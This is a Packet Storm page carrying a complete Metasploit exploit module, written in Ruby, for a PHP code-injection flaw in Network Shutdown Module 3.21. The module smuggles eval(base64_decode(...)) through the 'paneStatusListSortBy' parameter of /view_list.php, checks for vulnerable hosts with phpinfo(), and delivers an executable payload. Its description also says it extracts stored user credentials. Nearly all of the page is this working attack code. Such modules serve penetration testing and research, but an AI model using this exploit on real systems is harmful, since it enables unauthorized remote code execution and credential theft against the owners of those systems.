what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Network Shutdown Module 3.21 Remote PHP Code Injection

Network Shutdown Module 3.21 Remote PHP Code Injection
Posted Nov 29, 2012
Authored by sinn3r, h0ng10 | Site metasploit.com

This Metasploit module exploits a vulnerability in lib/dbtools.inc which uses unsanitized user input inside a eval() call. Additionally the base64 encoded user credentials are extracted from the database of the application. Please note that in order to be able to steal credentials, the vulnerable service must have at least one USV module (an entry in the "nodes" table in mgedb.db).

tags | exploit
advisories | OSVDB-83199
SHA-256 | ca94d18543aafa961d153b779642fdaf4da2fc45b207ec0756a59de101a2cf5d

Network Shutdown Module 3.21 Remote PHP Code Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in lib/dbtools.inc which uses
unsanitized user input inside a eval() call. Additionally the base64 encoded
user credentials are extracted from the database of the application. Please
note that in order to be able to steal credentials, the vulnerable service
must have at least one USV module (an entry in the "nodes" table in mgedb.db)
},
'Author' =>
[
'h0ng10', # original discovery, msf module
'sinn3r' # PhpEXE shizzle
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '83199'],
['URL', 'http://secunia.com/advisories/49103/']
],
'Payload' =>
{
'DisableNops' => true,
'Space' => 4000
},
'Platform' => ['php', 'linux'],
'Arch' => ARCH_PHP,

'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => 'Jun 26 2012'
))

register_options(
[
Opt::RPORT(4679)
], self.class)
end

def check
# we use a call to phpinfo() for verification
res = execute_php_code("phpinfo();die();")

if not res or res.code != 200
print_error("Failed: Error requesting page")
return CheckCode::Unknown
end

return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
return CheckCode::Safe
end

def execute_php_code(code, opts = {})
param_name = rand_text_alpha(6)
padding = rand_text_alpha(6)
url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

res = send_request_cgi(
{
'uri' => '/view_list.php',
'method' => 'POST',
'vars_get' =>
{
'paneStatusListSortBy' => url_param,
},
'vars_post' =>
{
param_name => Rex::Text.encode_base64(code),
},
'headers' =>
{
'Connection' => 'Close',
}
})
end

def no_php_tags(p)
p = p.gsub(/^<\?php /, '')
p.gsub(/ \?\>$/, '')
end

def exploit
print_status("#{rhost}:#{rport} - Sending payload")

unlink = (target['Platform'] == 'linux') ? true : false
p = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

execute_php_code(p)
handler
end
end

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close